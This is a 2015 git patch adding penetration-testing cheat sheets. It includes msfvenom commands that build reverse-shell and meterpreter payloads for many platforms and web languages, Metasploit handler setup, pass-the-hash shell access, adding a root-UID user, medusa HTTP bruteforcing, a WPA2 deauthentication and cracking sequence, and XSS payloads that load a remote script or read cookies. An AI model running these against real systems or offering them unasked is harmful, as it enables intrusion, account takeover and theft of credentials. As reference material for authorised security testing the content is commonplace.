From 9bc195d4cc05728c4ee29312124ac57ed54bb160 Mon Sep 17 00:00:00 2001
From: Jamie Shaw <jshaw87@gmail.com>
Date: Sat, 31 Oct 2015 11:03:26 +0000
Subject: [PATCH] Cheatsheet Updates

Cheatsheet Updates
---
 Cheatsheet_AIXBuild.txt           | 37 ++++++++++++++++
 Cheatsheet_MetasploitPayloads.txt | 71 +++++++++++++++++++++++++++++++
 Cheatsheet_PenTesting.txt         | 12 +++++-
 Cheatsheet_WirelessTesting.txt    | 16 ++++++-
 Cheatsheet_XSS.txt                |  9 ++++
 5 files changed, 142 insertions(+), 3 deletions(-)
 create mode 100644 Cheatsheet_AIXBuild.txt
 create mode 100644 Cheatsheet_MetasploitPayloads.txt
 create mode 100644 Cheatsheet_XSS.txt

diff --git a/Cheatsheet_AIXBuild.txt b/Cheatsheet_AIXBuild.txt
new file mode 100644
index 0000000..c28162f
--- /dev/null
+++ b/Cheatsheet_AIXBuild.txt
@@ -0,0 +1,37 @@
+loslevel:
+--------
+
+Reports back on installed service pack, maintenance etc. levels of the AIX deployment.
+Most of these appear to return absolutely nothing or loads of information.
+
+oslevel          (reports back the overall AIX version e.g. 6.1.0.0)
+oslevel -q     (reports back known maintenance levels on the host)
+oslevel -rq    (reports back known Recommended Maintenance Levels, think major releases)
+oslevel -sq    (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack)
+
+e.g.
+oslevel -s -g 6100-08-03-1339
+
+lslpp:
+------
+
+Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself
+
+e.g.
+lslpp -l         (lists all packages, most recent level and state of them)
+The package names can be passed back to it for more info, showing their patch management/application cycle.
+
+e.g. 
+lslpp -h bos.rte   - returns information regarding the updates applied to the Base Operating System package. bos.rte
+
+rpm:
+----
+
+Standard redhat package manager, has turned up on a few machines.
+
+rpm -qa 
+rpm -qa --last
+These will report back packages installed by rpm and when.
+
+Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag:
+e.g. find /home/ -perm 777
diff --git a/Cheatsheet_MetasploitPayloads.txt b/Cheatsheet_MetasploitPayloads.txt
new file mode 100644
index 0000000..804f7ca
--- /dev/null
+++ b/Cheatsheet_MetasploitPayloads.txt
@@ -0,0 +1,71 @@
+[+] Creating Metasploit Payloads
+
+List payloads
+msfvenom -l
+
+Binaries
+
+Linux
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
+
+Windows
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
+
+Mac
+msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
+
+
+Web Payloads
+
+PHP
+msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
+cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
+
+ASP
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
+
+JSP
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
+
+WAR
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
+
+
+Scripting Payloads
+
+Python
+msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
+
+Bash
+msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
+
+Perl
+msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
+
+
+Shellcode
+
+For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
+
+Linux Based Shellcode
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
+
+Windows Based Shellcode
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
+
+Mac Based Shellcode
+msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
+
+
+Handlers
+
+Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
+
+use exploit/multi/handler
+set PAYLOAD <Payload name>
+set LHOST <LHOST value>
+set LPORT <LPORT value>
+set ExitOnSession false
+exploit -j -z
+
+Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
diff --git a/Cheatsheet_PenTesting.txt b/Cheatsheet_PenTesting.txt
index 213524d..32e139d 100644
--- a/Cheatsheet_PenTesting.txt
+++ b/Cheatsheet_PenTesting.txt
@@ -241,6 +241,10 @@ ssh root@192.168.0.10
 
 -------------------------------------------------------------------------- Post Exploitation
 
+[+] Command prompt access on Windows Host
+
+pth-winexe -U Administrator%<hash> //<host ip> cmd.exe
+
 [+] Add Linux User
 /usr/sbin/useradd –g 0 –u 0 –o user
 echo user:password | /usr/sbin/chpasswd
@@ -400,4 +404,10 @@ ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=<domain>,
 
 Useful Links:
 http://www.lanmaster53.com/2013/05/public-facing-ldap-enumeration/
-http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/
\ No newline at end of file
+http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/
+
+
+-------------------------------------------------------------------------- Password Attacks
+
+[+] Bruteforcing http password prompts
+medusa -h <ip/host> -u <user> -P <password list> -M http -n <port> -m DIR:/<directory> -T 30
diff --git a/Cheatsheet_WirelessTesting.txt b/Cheatsheet_WirelessTesting.txt
index 755d3e7..0ad9717 100644
--- a/Cheatsheet_WirelessTesting.txt
+++ b/Cheatsheet_WirelessTesting.txt
@@ -1,4 +1,16 @@
-WPA PSK attack with aircrack-ng suite.
+WPA2 PSK attack with aircrack-ng suite.
+---------------------------------------
+
+ifconfig wlan1 # check wireless IFace
+sudo airmon-ng check kill  # kill issue causing processes
+sudo airmon-ng start wlan1 # start monitor mode
+sudo airodump-ng wlan1mon  # start capturing
+sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
+sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon   # deauthenticate the client
+sudo aircrack-ng output-01.cap dict # crack the passphrase
+
+
+WPA PSK attack with aircrack-ng suite.
 --------------------------------------
 
 Place your wireless card into Monitor Mode
@@ -106,4 +118,4 @@ Advanced Encryption Standard (AES)
 - Attack: 
 Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
 - Remediation:
-WPA-Enterprise
\ No newline at end of file
+WPA-Enterprise
diff --git a/Cheatsheet_XSS.txt b/Cheatsheet_XSS.txt
new file mode 100644
index 0000000..5386f89
--- /dev/null
+++ b/Cheatsheet_XSS.txt
@@ -0,0 +1,9 @@
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
+alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
+></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+<IMG SRC="javascript:alert('XSS');">
+
+<a onmouseover="alert(document.cookie)">xxs link</a>
+<a onmouseover=alert(document.cookie)>xxs link</a>